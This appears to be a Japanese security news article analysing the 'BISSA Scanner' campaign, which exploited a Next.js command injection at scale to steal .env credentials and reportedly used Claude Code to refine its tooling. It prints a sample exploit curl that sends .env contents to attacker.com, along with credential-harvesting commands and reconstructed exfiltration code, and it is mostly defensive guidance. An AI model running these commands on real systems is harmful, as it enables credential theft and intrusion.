🏠 ホーム ニュース 📖 解説記事 📚 トピック解説 🏷️ タグ一覧 ℹ️ About
ツール
💰 API料金計算機 NEW
🔍 記事を検索
カテゴリ
📡 RSSフィード
Follow
X (Twitter) 🧵 Threads
🔧 ツール
💰API料金計算機
トピック
🧠 Claude Code 🤖 AIエージェント 🎵 AIコーディング / Vibe Coding 🔌 MCP(Model Context Protocol) 🔍 RAG & ナレッジシステム 💬 LLM / ローカルAI 🔒 セキュリティ ⚙️ DevOps & 自動化 💰 Claude API & 料金 🎨 UI生成 & デザインシステム
ニュース一覧 🏷️タグから探す
Subscribe
📡 RSSフィード
ホーム security 2026.04.23

BISSA Scanner解析:AI支援の大規模脆弱性スキャンと.envクレデンシャル窃取の仕組み

BISSA Scanner — AI-Assisted Mass Exploitation
🕵️
BISSA Scanner解析:AI支援の大規模脆弱性スキャンと.envクレデンシャル窃取の仕組み - AIツール日本語解説 | AI Heartland
// なぜ使えるか
Claude CodeとOpenClawを攻撃ツールに組み込み、CVE-2025-55182でNext.jsを900社以上に悪用。.envから30,000件超のAnthropicやAWSのAPIキーを収集した新型プラットフォームBISSA Scannerの技術構造を解析する。

2026年4月22日、インシデント対応専門組織DFIR Reportが異例の調査報告を公開した。偶然露出した攻撃インフラのサーバーから、AI支援の大規模クレデンシャル収集プラットフォーム「BISSA Scanner」の全容が明らかになったのだ。

特筆すべきは、このプラットフォームがClaude CodeとOpenClawをコード改善・自動化に組み込んでいた点だ。攻撃者がLLMを自分たちのツール改良に積極的に活用していたことが、公開されたファイルとTelegramのやりとりから確認された。2025年9月から2026年4月にかけての活動で、900社以上でのCVE-2025-55182悪用と、30,000件を超える.envファイルからのクレデンシャル収集が明らかになった。

この記事の対象読者
Next.jsやReactアプリをインターネットに公開しているエンジニア。.envファイルにAPIキーやクラウド認証情報を保存しているチーム。AI API(Anthropic、OpenAI、Gemini等)のキー管理を担当するセキュリティ担当者。

BISSA Scannerとは何か——AI支援の新型大規模脆弱性悪用プラットフォーム

BISSA Scannerは、「大規模で多目的の搾取・段階構成・レビュー・検証」を実現するモジュール型プラットフォームだ。一言で言えば、脆弱なWebアプリケーションを自動的に発見し、認証情報を根こそぎ収集して分類するSaaS的な攻撃インフラである。

露出したサーバーには13,000以上のファイルと150以上のディレクトリが存在し、S3バケットの変遷履歴からは2025年9月から継続的な開発・運用が確認された。

バケット名 活動時期 備考
bissa 2025年9月 初期バージョン
bissa2 2025年11月 機能拡張版
bissapromax 2025年12月〜 現行の本番バケット

バケット名の変遷は開発サイクルを反映している。「promax」という命名はスマートフォンの上位モデルを連想させ、攻撃プラットフォームのバージョン管理が商業ソフトウェアと変わらない体制で行われていることを示す。

プラットフォームのコアモジュール

BISSA Scannerは以下の主要モジュールで構成される。

この分業体制により、標的の発見から認証情報の収集・検証・優先順付けまでが一気通貫で自動化されている。

flowchart TD A["標的リスト取得
denemekulubum[.]com[.]tr/acquirer/"] -->|"ZIPアーカイブ
ダウンロード"| B["リースへの割り当て
cve_2025_55182モジュール"] B -->|"CVE悪用"| C["コマンド実行
Next.js サーバー"] C -->|"ファイル列挙"| D[".env / クラウドメタデータ
/ K8s サービスアカウント"] D -->|"バッチ化・ZIP圧縮"| E["results/ ディレクトリ"] E -->|"自動アップロード"| F["S3 Filebase
bissapromax バケット"] F -->|"高価値クレデンシャル
検出時"| G["Telegram アラート
@bissapwned_bot"] H["Claude Code + OpenClaw
AI支援層"] -->|"コード改善・
デバッグ"| B style A fill:#ef4444,color:#fff style F fill:#f97316,color:#fff style H fill:#8b5cf6,color:#fff

CVE-2025-55182:Next.jsのコマンドインジェクションが大規模悪用の起爆剤になった

BISSA Scannerの主力エクスプロイトであるCVE-2025-55182は、Next.jsのServer-Side Rendering(SSR)層に存在するコマンドインジェクション脆弱性だ。報告書ではReact2Shell(CVE)として識別されている。

脆弱性の仕組み

Next.jsのAPIルートやSSR処理において、ユーザー入力がサニタイズされずにOSコマンドの一部として実行される経路が存在する。攻撃者はこの経路を通じて任意のシェルコマンドを実行し、サーバー上の機密ファイルを取得できる。

# CVE-2025-55182の概念的な悪用コード
# 実際の攻撃は自動化されており、以下はエクスプロイトの仕組みを示す例示です

# 攻撃者がスキャンツールで行う操作(概念)
curl -X POST "https://target-nextjs-app.com/api/render" \
  -d '{"component": "$(cat .env | base64 | curl -X POST attacker.com/collect -d @-)"}'

# 脆弱なサーバー上で実行される相当処理:
# 1. .envファイルの内容を読み取る
# 2. Base64エンコード
# 3. 攻撃者のサーバーにPOSTで送信

BISSAのスキャナーはこのエクスプロイトをモジュール化し、大量の標的に対して自動実行する。単一のエクスプロイト成功につき、サーバー上のすべての.envファイル、クラウドプロバイダーのメタデータエンドポイント(169.254.169.254)、Kubernetesサービスアカウントトークンを一括取得する。

悪用規模:900社以上のNext.jsサービスが対象に

DFIR Reportの調査では、BISSA Scannerによって900社以上のNext.jsアプリケーションでCVE-2025-55182の悪用が成功したことが確認された。影響を受けた業種は次のとおりだ。

業種 被害内容
金融・税務顧問(被害者A) 決済APIキー、顧客データベース接続情報の漏洩
デジタル資産・エンタープライズファイナンス(被害者B) クラウドインフラ認証情報、暗号資産ウォレット情報の漏洩
給与計算・HR・ステーブルコイン決済(被害者C) 従業員データ関連APIキー、決済プラットフォームシークレットの漏洩

同様の.envベースの漏洩については、Gemini APIキーの不正利用記事でも解説しているが、BISSA Scannerの場合は個人ミスではなく、自動化された大規模攻撃が原因だ。パッチ適用前のNext.jsを動かしているサービスは、意図せず攻撃対象リストに載っていた可能性がある。


スキャンワークフローの詳細:標的取得から.env窃取まで

BISSA Scannerのオペレーションは、外部の標的フィード取得から始まる精緻なパイプラインで動く。

ステップ1:標的リストの取得

スキャナーはdenemekulubum[.]com[.]tr/acquirer/(以前はwiprz[.]com/acquirer/)からZIPアーカイブ形式で標的リストを取得する。これは自前のスキャン基盤(cs2.ip.thc.orgなど)と外部のターゲットフィードを組み合わせた仕組みだ。

# BISSA Scannerの標的取得ロジック(公開ファイルから復元)
import requests
import zipfile
import io

def acquire_targets(acquirer_url: str) -> list[str]:
    """外部フィードから標的URLリストを取得する"""
    response = requests.get(f"{acquirer_url}/targets.zip")
    with zipfile.ZipFile(io.BytesIO(response.content)) as z:
        with z.open("targets.txt") as f:
            return [line.decode().strip() for line in f.readlines()]

# リースへの割り当て(分散処理)
def assign_lease(targets: list[str], module: str = "cve_2025_55182"):
    for target in targets:
        queue.put({"url": target, "module": module})

ステップ2:エクスプロイト実行と.env収集

各ワーカーはキューからタスクを取得し、該当モジュールでエクスプロイトを試みる。成功した場合、以下の情報を優先的に収集する。

# 成功時の収集対象(スキャナーが自動実行するコマンド群の概念)
# 1. .envファイルの列挙
find / -name ".env" -o -name ".env.local" -o -name ".env.production" 2>/dev/null

# 2. クラウドメタデータの取得(AWS IMDSv1)
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/

# 3. Kubernetesサービスアカウントトークン
cat /var/run/secrets/kubernetes.io/serviceaccount/token

# 4. 暗号資産ウォレットの設定ファイル
find / -name "*.wallet" -o -name "keystore" 2>/dev/null

ステップ3:S3へのエクスフィルトレーション

収集した.envファイルはローカルのresults/ディレクトリにバッチ保存され、ZIP圧縮後にFilebase(S3互換ストレージ)のbissapromaxバケットへ自動アップロードされる。

# エクスフィルトレーションの処理(復元コード)
import boto3
import zipfile
import os

def exfiltrate_results(results_dir: str, bucket: str = "bissapromax"):
    s3 = boto3.client(
        "s3",
        endpoint_url="https://s3.filebase.com",
        aws_access_key_id=os.environ["FILEBASE_KEY"],
        aws_secret_access_key=os.environ["FILEBASE_SECRET"]
    )
    
    # ZIP圧縮してアップロード
    archive_name = f"results_{datetime.now().strftime('%Y%m%d_%H%M%S')}.zip"
    with zipfile.ZipFile(archive_name, "w") as zf:
        for env_file in Path(results_dir).glob("**/.env*"):
            zf.write(env_file)
    
    s3.upload_file(archive_name, bucket, archive_name)

DFIR Reportによると、2026年4月10〜21日の11日間だけで65,000以上のアーカイブエントリがS3バケットに蓄積されていた。


AIの組み込み:Claude CodeとOpenClawによるスキャナー自動改善

BISSA Scannerの最も注目すべき側面は、LLMを攻撃ツール自体の改善に活用している点だ。露出したサーバーにはclaude_env_fix.shというシェルスクリプトが存在し、Telegramのやりとりには次のような記録が残っていた。

「オペレータはClaude Codeを使用してスキャナーのコードベースを読み込み、理解し、トラブルシューティングを行っていた」

Claude Codeの活用方法

確認された使用パターンは主に以下の2つだ。

1. コードベースの理解とデバッグ スキャナーのPythonコードに問題が発生した際、Claude Codeにコードベース全体を読み込ませてエラー原因を特定させていた。claude_env_fix.shは環境変数の設定ミスを自動修正するスクリプトで、Claude Codeの提案を元に作成されたとみられる。

2. Chain-of-Thought(CoT)プロンプトによる改善計画 攻撃者はClaude Codeに「このモジュールはどう改善できるか」「スキャン速度を上げるにはどうすればよいか」といったChain-of-Thoughtプロンプトを投げ、スキャナーのアーキテクチャ改善に活用していた。

OpenClawとのWebSocketゲートウェイ統合

さらに、サーバーにはOpenClawとのWebSocketゲートウェイが設置されており、ブラウザ制御機能も確認された。claude-sonnet-4-6モデルプールとの接続設定が露出したファイルに残っており、Telegramの@bissa_scan_botを通じた指令系統が構築されていた。

{
  "ai_relay": {
    "model_pool": ["claude-sonnet-4-6"],
    "websocket_gateway": "ws://localhost:8765",
    "browser_control": true,
    "telegram_bot": "@bissa_scan_bot",
    "openclaw_integration": true
  }
}

OpenClawのセキュリティリスクの記事でも取り上げたように、OpenClawはAIエージェントをTelegramやWebSocket経由で外部制御できる構造を持つ。BISSA Scannerはその仕組みを攻撃インフラとして転用した。

AIモデルの悪用に関する重要な注記
Claude CodeやAnthropicのモデルは、使用ポリシーによってサイバー攻撃への支援を明示的に禁止している。今回のケースでは攻撃者が通常のコーディング支援として利用していたとみられ、Anthropicおよびモデル側の機能として攻撃を「支援」したわけではない。AIツールの悪用を防ぐには、利用規約の遵守と異常な使用パターンの検知が重要だ。

被害の実態:30,000件.envファイルと収集されたクレデンシャルの全貌

露出したS3バケットの分析から、BISSA Scannerが収集した認証情報の規模と種類が明らかになった。

収集規模

収集されたクレデンシャルのカテゴリ

カテゴリ 対象サービス リスクレベル
AIプラットフォーム Anthropic、OpenAI、Google AI、Mistral 極高(課金爆発・プロンプトインジェクション悪用)
クラウドインフラ AWS、Azure、GCP、Cloudflare 極高(インフラ掌握・データ窃取)
決済プラットフォーム Stripe、PayPal、Shopify、Square 極高(金融詐欺・不正決済)
メッセージング・通知 Telegram Bot Token、Twilio、SendGrid 高(スパム送信・フィッシング)
データベース MongoDB、Supabase 高(データ漏洩・ランサム)
認証・ID管理 Auth0、Clerk 高(アカウント乗っ取り)
暗号資産 ウォレット設定、取引所APIキー 極高(直接的な金銭被害)

特にAI APIキーの漏洩は深刻だ。Anthropicのキーは1トークンあたりのコスト構造から、短時間で数百万円規模の請求が発生し得る。Gemini APIキーの不正利用防止でも解説したように、AIキーの漏洩は従来のパスワード漏洩と比べて即時かつ大規模な金銭被害につながる。

被害者プロファイル

3つの具体的な被害者(匿名化)が報告された。いずれも金融・決済関連の業種で、クレデンシャルの価値が特に高い業種が優先的に狙われていることがわかる。

DFIR Reportは調整開示(Coordinated Disclosure)を実施し、被害者への直接通知と法執行機関への報告を完了している。露出したサーバーのIPアドレスは公開されていないが、法執行機関との連携のもと取り扱われている。


IoC(侵害の痕跡):攻撃者インフラの詳細

以下のIoCをセキュリティ機器・WAFに登録することを推奨する
DFIRレポートに基づくIndicators of Compromise。括弧表記([.])はURLの誤クリック防止のため。

ドメインとURL

denemekulubum[.]com[.]tr/acquirer/    # 標的フィードの配信元(現行)
wiprz[.]com/acquirer/                  # 標的フィードの配信元(廃止)
s3.filebase[.]com                      # S3互換ストレージ(エクスフィル先)
cs2.ip.thc.org                         # ターゲットフィード源(外部)

Telegramアカウント

アカウント ユーザーID 役割
@BonJoviGoesHard(表示名: “Dr. Tube”) 1609309278 オペレータ
@bissapwned_bot 8798206332 成果通知ボット
@bissa_scan_bot 不明 AI制御サブシステム

S3バケット

bissa        # 2025年9月(廃止)
bissa2       # 2025年11月(廃止)
bissapromax  # 2025年12月〜(現行)

CVE番号

CVE-2025-55182  # React2Shell(Next.js)コマンドインジェクション(主力)
CVE-2025-9501   # 補助モジュールで使用(詳細非公開)

Vercelセキュリティ侵害の記事でも報告されたように、Next.js関連のCVEは公開後に急速に悪用が広がる傾向がある。CVE-2025-55182についても、公開から悪用開始まで短期間だったと推察される。


BISSAで狙われたNext.jsアプリを守る:具体的な防御策

DFIR ReportはBISSA Scanner対策として6つの防御領域を推奨している。実装優先度の高い項目から順に解説する。

1. 緊急:CVEパッチの適用

Next.js環境を運用しているなら、まずバージョンを確認してパッチを適用する。

# Next.jsのバージョン確認
node -e "const pkg = require('./node_modules/next/package.json'); console.log(pkg.version);"

# npm経由でのアップデート
npm update next

# yarn経由でのアップデート
yarn upgrade next

# 脆弱性スキャン(CVE-2025-55182対応確認)
npm audit --audit-level=high

インターネット向けアプリケーションは「短いアップデート周期」を維持することが基本だ。Renovate・Dependabotの自動更新を活用すれば、パッチリリース後の適用遅延を大幅に短縮できる。

2. .envファイルからシークレットマネージャーへの移行

BISSA Scannerが狙うのは.envファイルだ。.envに認証情報を持つ構成そのものをリスクとして捉え、実行時注入に移行する。

# AWS Secrets Managerへの移行例
# 既存の.envキーをAWSに保存
aws secretsmanager create-secret \
  --name "myapp/production" \
  --secret-string '{"ANTHROPIC_API_KEY":"sk-ant-...","STRIPE_SECRET":"sk-live-..."}'

# アプリケーション起動時に動的取得
aws secretsmanager get-secret-value \
  --secret-id "myapp/production" \
  --query SecretString \
  --output text | jq -r 'to_entries[] | "export \(.key)=\(.value)"' | source /dev/stdin
// Next.jsアプリでの実行時シークレット取得例
import { SecretsManagerClient, GetSecretValueCommand } from "@aws-sdk/client-secrets-manager";

async function getSecrets() {
  const client = new SecretsManagerClient({ region: "ap-northeast-1" });
  const command = new GetSecretValueCommand({ SecretId: "myapp/production" });
  const response = await client.send(command);
  return JSON.parse(response.SecretString!);
}

// サーバーサイドでのみ呼び出す(getServerSideProps, Route Handlers)
export async function GET() {
  const secrets = await getSecrets();
  // クライアントには絶対に返さない
}

3. 送信トラフィックの制御

BISSA Scannerはクレデンシャルを外部のS3バケットに送信する。アプリケーション層からの異常な送信トラフィックを検知・ブロックするには、送信プロキシが有効だ。

# Nginx(リバースプロキシ)での送信制御例
# アプリケーションは外部への直接通信を禁止し、プロキシ経由のみ許可

upstream app_server {
    server 127.0.0.1:3000;
}

# 許可する送信先のみをホワイトリスト化
geo $blocked_destination {
    default 0;
    # s3.filebase.comなどの未承認S3エンドポイントをブロック
    2a06:98c1::/32 1;  # Cloudflare経由のFilebase IP範囲(例)
}

4. カナリートークンの設置

本物のAPIキーに混ぜてカナリートークン(ハニーポット)を設置することで、.envファイルの漏洩を早期検知できる。

# canary.py: カナリートークンの生成と監視
import hashlib
import hmac
import os

def generate_canary_token(identifier: str) -> str:
    """追跡可能なカナリートークンを生成"""
    secret = os.environ.get("CANARY_SECRET", "change-this-in-production")
    token = hmac.new(
        secret.encode(),
        identifier.encode(),
        hashlib.sha256
    ).hexdigest()[:32]
    return f"canary_{identifier}_{token}"

# .envに仕込む例
# FAKE_ANTHROPIC_KEY=canary_anthropic_a3f9b2c1d4e5f6...
# → このキーが使用されたらアラート発火

# 使用検知のWebhookエンドポイント(Canarytokens.orgなどのサービスを活用)
CANARY_WEBHOOK_URL = "https://canarytokens.org/your-token-id/..."

5. クラウドメタデータエンドポイントの保護

AWS IMDSv1(169.254.169.254)はBISSA Scannerの収集対象だ。IMDSv2への移行でメタデータ窃取を防ぐ。

# EC2インスタンスでIMDSv1を無効化してIMDSv2のみ許可
aws ec2 modify-instance-metadata-options \
  --instance-id i-xxxxxxxxxxxxxxxxx \
  --http-tokens required \
  --http-put-response-hop-limit 1

# Kubernetesでメタデータエンドポイントへのアクセスを制限
cat <<EOF | kubectl apply -f -
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: block-metadata-endpoint
spec:
  podSelector: {}
  policyTypes:
  - Egress
  egress:
  - to:
    - ipBlock:
        cidr: 0.0.0.0/0
        except:
        - 169.254.169.254/32  # メタデータエンドポイントを除外
EOF

6. 認証情報の定期ローテーションと漏洩検知

# truffleHogで既存リポジトリの認証情報漏洩をスキャン
pip install trufflehog
trufflehog git https://github.com/your-org/your-repo \
  --only-verified \
  --since-commit HEAD~100

# GitHub Secret Scanningの有効化(GitHub Enterpriseなら必須)
gh api repos/your-org/your-repo \
  --method PATCH \
  -f security_and_analysis.secret_scanning.status=enabled

# APIキーローテーションの自動化スクリプト(月次実行例)
# rotate_keys.sh をCronまたはGitHub Actionsで定期実行

セキュリティ対策チェックリスト

以下を今すぐ確認しよう。

BISSA Scanner対策:今日から実行できる確認項目

緊急(48時間以内):
□ Next.jsのバージョンを確認し、CVE-2025-55182のパッチを適用
□ 過去1週間のAPIキー使用ログを確認し、異常なスパイクがないかチェック
□ denemekulubum[.]com[.]trやwiprz[.]comへのアクセスログを確認
□ .envファイルをgitignoreに追加し、コミット履歴をスキャン

短期(1週間以内):
□ 主要APIキー(Anthropic、OpenAI、AWS)をローテーション
□ .envをシークレットマネージャー(AWS Secrets Manager、Vault等)に移行
□ IMDSv2への移行(AWS EC2使用の場合)
□ カナリートークンを.envに設置

継続的:
□ 依存関係の自動更新を設定(Renovate推奨)
□ 送信トラフィックのログ・プロキシ設定
□ 年1回の本番キー漏洩テーブルトップ訓練

BISSA Scannerが示す攻撃トレンドの変化

BISSA Scannerの登場は、いくつかの重要なトレンドを示している。

第一に、AIの攻撃ツールへの組み込みが現実化した。 これまでは「AIが攻撃を支援する」という話は仮説的なシナリオが多かった。しかし今回、Claude CodeとOpenClawが実際の攻撃プラットフォームの開発・改善に使われていたことが確認された。AIを悪用した攻撃の「自動化」と「品質向上」が同時進行している。

第二に、.envファイルのクレデンシャル管理が根本的に問題視された。 30,000件の.envファイルが収集されたという事実は、業界全体の.env管理の甘さを浮き彫りにする。開発の利便性のために.envに機密情報を入れる慣行は、今後ますます危険になる。

第三に、AI APIキーが最優先の攻撃対象になっている。 Anthropic、OpenAI、GoogleのAPIキーは決済キーと同等かそれ以上の金銭的価値を持つ。AIサービスのコスト構造上、キー1本が流出するだけで数百万円規模の被害が発生し得る。

GlassWormが見えないコードでサプライチェーンを攻撃したように、BISSA Scannerはパッチ未適用のWebフレームワークを自動スキャンして.envを根こそぎ奪う——攻撃の自動化と高度化は加速する一方だ。

GlassWormによるサプライチェーン攻撃と合わせて読むことで、現在の攻撃者が「広く浅く、自動で」クレデンシャルを収集していることが見えてくる。


まとめ

DFIR Reportが暴いたBISSA Scannerは、以下の点で従来の攻撃ツールと一線を画す。

対策の核心は3点だ。①CVEパッチを即座に適用する、②.envからシークレットマネージャーへ移行する、③APIキーのローテーションとカナリートークンで検知体制を整える。この3つを実施するだけで、BISSA Scannerタイプの自動スキャンに対する耐性を大幅に高められる。


参照ソース

B!
B! この記事をはてブに追加
よくある質問
BISSA Scannerとは何ですか?
大規模で多目的のモジュール型脆弱性悪用プラットフォームです。CVE-2025-55182(Next.jsコマンドインジェクション)を中核に、インターネット規模でのスキャン・クレデンシャル収集・検証・優先順付けを自動化します。2025年9月から2026年4月にかけて活動が確認されています。
CVE-2025-55182とはどのような脆弱性ですか?
React2Shell(Next.js)に存在するコマンドインジェクション脆弱性です。この脆弱性を悪用することで攻撃者は対象サーバーで任意コマンドを実行でき、.envファイルやクラウドメタデータ、Kubernetesサービスアカウント情報を取得できます。
どのようなAPIキーが収集されましたか?
Anthropic(Claude)、OpenAI、Google AI、Mistralなどの主要AI API、AWS・Azure・GCP・Cloudflareのクラウド認証情報、Stripe・PayPal・Shopifyの決済キー、Supabase・MongoDBのDB接続情報など幅広いカテゴリが対象でした。
Claude Codeはどのように悪用されましたか?
攻撃者はClaude Codeをスキャナーのコードベース理解・デバッグ・Chain-of-Thoughtプロンプトによる改善計画の立案に使用しました。claude-sonnet-4-6モデルと接続されたWebSocketゲートウェイ、ブラウザ制御機能が確認されています。
自社が被害を受けているかどうかを確認するには?
APIキーの使用ログを確認し、denemekulubum[.]com[.]trやwiprz[.]comからのアクセスがないかを調べてください。また、Telegramアカウント @bissapwned_bot からの通知や、S3バケット名「bissapromax」へのエクスフィルトレーションが発生していないか確認します。
🤖
AIエージェント
AIエージェントの作り方、フレームワーク比較、マルチエージェント設計 →
広告
GitHub で見る
役に立ったらシェアをお願いします
🔔 AI速報、毎日Xで配信中
Claude Code・MCP・AIエージェントの最新ニュースをいち早くお届け
@peaks2314 をフォロー
記事の信頼性について
AI Heartland エディトリアルポリシーに基づき作成
複数ソース照合
公式情報・報道等を突き合わせて確認
ファクトチェック済
ソースURLの内容を検証
参照ソース明記
記事末尾に引用元を掲載
Next Read →
🛡️ OWASP APTS:AIエージェント時代の自律型ペネトレーションテスト基準を読む
関連記事
🛡️ OWASP APTS:AIエージェント時代の自律型ペネトレーションテスト基準を読む
OWASP APTSは自律型ペネトレーションテストプラットフォームのガバナンス基準。Tier 1〜3の173要件を全ドメイン解説。Claude Code・Cursor等が準拠できるか、セキュリティ界隈の懐疑論も踏まえ現実を検証。
2026.04.23
🛡️ 「人間かボットか」を超えて:CloudflareのPrivacy Pass・Web Bot Auth・Agent Registryで変わるアクセス制御
CloudflareがAIエージェント時代のアクセス制御を再設計。1日数十億トークンを処理するPrivacy Pass・Web Bot Auth・Agent RegistryとARC匿名認証の技術を解説。「人間 vs ボット」二分法がなぜ限界かを実例で示す。
2026.04.22
💉 GitHubコメントがAIエージェントを乗っ取る:「Comment and Control」攻撃の仕組みと防御策
GitHubのPR・IssueコメントにAIへの命令を隠す「Comment and Control」攻撃を解剖。Claude Code(CVSS 9.4)・Gemini CLI・GitHub CopilotがAPIキーを流出させる仕組みと、CI/CD環境での実践的防御策をコード例付きで解説。
2026.04.22
🚨 MCP脆弱性:STDIOトランスポートの設計欠陥で20万台のサーバーがRCEの危険に——OX Securityが警告
AnthropicのMCPに設計レベルの脆弱性が発覚。STDIOトランスポートで任意コマンド実行が可能に。CVE 10件超、Cursor・LiteLLM・LangChain等が影響。4つの攻撃経路と防御策をコード付きで解説。
2026.04.21
Popular
#1 POPULAR
🎨 Claude Design使い方・料金・v0/Figma比較 — テキストだけでプロトタイプを作るAnthropicのAIデザインツール
Anthropicが2026年4月に公開したClaude DesignはPro月額$20から追加費用なしで使えるAIデザインツール。テキスト指示だけでプロトタイプ・スライド・LPを生成できる。料金・Figma/v0/Lovable比較・オンボーディング手順・実践プロンプト例まで、デザイン知識ゼロから使い始める方法をまとめた。
#2 POPULAR
🎨 awesome-design-md:DESIGN.mdでAIにUI生成させる方法【58ブランド対応】
DESIGN.mdをプロジェクトに置くだけでAIエージェントが一貫したUI生成を実現。Vercel・Stripe・Claudeなど58ブランドのデザイン仕様をnpx 1コマンドで導入する方法と、実際の出力差を検証した結果を解説。
#3 POPULAR
📊 TradingView MCP:Claude CodeからTradingViewを完全操作する78ツールのMCPサーバー
TradingView MCPはClaude CodeからTradingView Desktopを直接操作できる78ツール搭載のMCPサーバー。チャート分析、Pine Script開発、マルチペイン、アラート管理、リプレイ練習まで自然言語で実行。導入手順を解説
#4 POPULAR
🔍 last30days-skill完全ガイド|Reddit・X・YouTube横断AIリサーチスキルの使い方2026年版
last30days-skillはReddit・X・YouTube・TikTokなど10+ソースを横断して最新30日のトレンドをAIで分析するClaude Codeスキル。使い方・設定・活用例を解説。
#5 POPULAR
🚨 Composer 脆弱性 CVE-2026-40261 PerforceドライバRCE、2.9.6/2.2.27で修正
PHP Composerの脆弱性CVE-2026-40261(CVSS 8.8)はPerforce未インストールでも任意コード実行が成立。composer install/requireでRCEリスク。修正版2.9.6/2.2.27へ今すぐcomposer self-updateで更新。全PHP開発者・CI環境が影響対象。
← Caveman Claudeで65%トークン削減|散文を「原始人語」に圧縮するClaude Codeスキル解説 OWASP APTS:AIエージェント時代の自律型ペネトレーションテスト基準を読む →